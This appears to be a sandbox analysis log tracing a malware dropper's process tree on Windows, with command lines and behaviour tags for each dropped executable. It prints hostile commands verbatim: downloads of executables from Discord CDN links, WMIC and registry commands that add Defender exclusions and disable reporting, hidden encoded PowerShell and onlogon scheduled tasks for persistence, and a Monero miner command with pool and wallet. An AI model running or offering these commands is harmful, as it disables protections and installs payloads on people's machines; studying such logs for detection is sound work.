C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exe /qn CAMPAIGN=654 & exit12⤵
C:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exeC:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exe /qn CAMPAIGN=65413⤵
C:\Users\Admin\Documents\mIlYO2PyRnBpdQPMVtWd6Z5a.exe"C:\Users\Admin\Documents\mIlYO2PyRnBpdQPMVtWd6Z5a.exe"6⤵
- Executes dropped EXE
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Roaming\3132033.scr"C:\Users\Admin\AppData\Roaming\3132033.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
C:\Users\Admin\AppData\Roaming\2921518.scr"C:\Users\Admin\AppData\Roaming\2921518.scr" /S8⤵
C:\Users\Admin\AppData\Roaming\5968173.scr"C:\Users\Admin\AppData\Roaming\5968173.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Roaming\8325071.scr"C:\Users\Admin\AppData\Roaming\8325071.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\AppData\Roaming\2113902.scr"C:\Users\Admin\AppData\Roaming\2113902.scr" /S8⤵
C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe"C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\ll7hAlWZUM8aVRdhySt_kLQl.exe" & exit7⤵
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"6⤵
- Executes dropped EXE
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\2C6C.bat C:\Users\Admin\Documents\BqM9xg9qbPitNmvDRi7VB_Mv.exe"7⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/892683460685221901/894952595939004426/1.exe" "1.exe" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\7930\1.exe1.exe8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879751738779910146/886597429477122078/55.exe" "55.exe" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879751738779910146/879751944061734982/setup.exe" "" "" "" "" "" "" ""8⤵
C:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2C6A.tmp\2C6B.tmp\extd.exe "" "" "" "" "" "" "" "" ""8⤵
C:\Users\Admin\Documents\NxIkUSKf9VBiWWvuufV4fDQe.exe"C:\Users\Admin\Documents\NxIkUSKf9VBiWWvuufV4fDQe.exe"6⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\7zS248A.tmp\Install.exe.\Install.exe7⤵
C:\Users\Admin\AppData\Local\Temp\7zS5128.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
- Executes dropped EXE
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goejnMuUh" /SC once /ST 06:50:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ptbavum.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"C:\Users\Admin\Documents\J492h11PeW4FIMg2ZMZJh672.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\lQsTdAlkjYNFfnwvOn0eBKaz.exe"C:\Users\Admin\Documents\lQsTdAlkjYNFfnwvOn0eBKaz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\luvO_4is6mQFfHuxYrzdcbZB.exe"C:\Users\Admin\Documents\luvO_4is6mQFfHuxYrzdcbZB.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\BVEDf_soBBvQiBPdzpwHsDT7.exe"C:\Users\Admin\Documents\BVEDf_soBBvQiBPdzpwHsDT7.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\YsrDtrUWJpAIJknuajZA_Tgl.exe"C:\Users\Admin\Documents\YsrDtrUWJpAIJknuajZA_Tgl.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4229854.scr"C:\Users\Admin\AppData\Roaming\4229854.scr" /S7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2353450.scr"C:\Users\Admin\AppData\Roaming\2353450.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\7842883.scr"C:\Users\Admin\AppData\Roaming\7842883.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7494909.scr"C:\Users\Admin\AppData\Roaming\7494909.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3987985.scr"C:\Users\Admin\AppData\Roaming\3987985.scr" /S7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"C:\Users\Admin\Documents\D88ljDFq9UNOTj9KFLyY3k9N.exe"7⤵
-
C:\Users\Admin\Documents\xYJIic1KM0Xbco03L0Ro5fdE.exe"C:\Users\Admin\Documents\xYJIic1KM0Xbco03L0Ro5fdE.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\zcTMrSsC4g_EqadNJiqR1MnZ.exe"C:\Users\Admin\Documents\zcTMrSsC4g_EqadNJiqR1MnZ.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\U4uZdyxAijsXh5zAJKtumxYy.exe"C:\Users\Admin\Documents\U4uZdyxAijsXh5zAJKtumxYy.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"7⤵
-
C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"C:\Users\Admin\Documents\cVMGrdBG7bRqTx2km4LCCZhc.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\omEx3DWuyvkBKV7FT0AQ3ScE.exe"C:\Users\Admin\Documents\omEx3DWuyvkBKV7FT0AQ3ScE.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exeFri106e757f6d75.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1208989.scr"C:\Users\Admin\AppData\Roaming\1208989.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1497499.scr"C:\Users\Admin\AppData\Roaming\1497499.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5372622.scr"C:\Users\Admin\AppData\Roaming\5372622.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1264582.scr"C:\Users\Admin\AppData\Roaming\1264582.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2355771.scr"C:\Users\Admin\AppData\Roaming\2355771.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 2368⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6168⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6408⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6488⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6448⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TJ7Q2.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-TJ7Q2.tmp\installer.tmp" /SL5="$2043A,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\vc.exe/install /quiet8⤵
-
C:\Windows\Temp\{7C53AA05-CCE4-4C77-8C6F-741F9CD6258C}\.cr\vc.exe"C:\Windows\Temp\{7C53AA05-CCE4-4C77-8C6F-741F9CD6258C}\.cr\vc.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc.exe" -burn.filehandle.attached=548 -burn.filehandle.self=556 /quiet9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Windows\Temp\{32A7608C-7D22-456C-A951-25504930A3BD}\.be\VC_redist.x86.exe"C:\Windows\Temp\{32A7608C-7D22-456C-A951-25504930A3BD}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{894E0D6F-26B1-4B5B-9AAC-9662DDE00A68} {C48FB6E2-43A2-4CA3-BFFB-12C92183AF80} 588410⤵
- Adds Run key to start application
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 83210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7648⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7848⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6168⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 7488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 9248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 8128⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 6248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 6088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
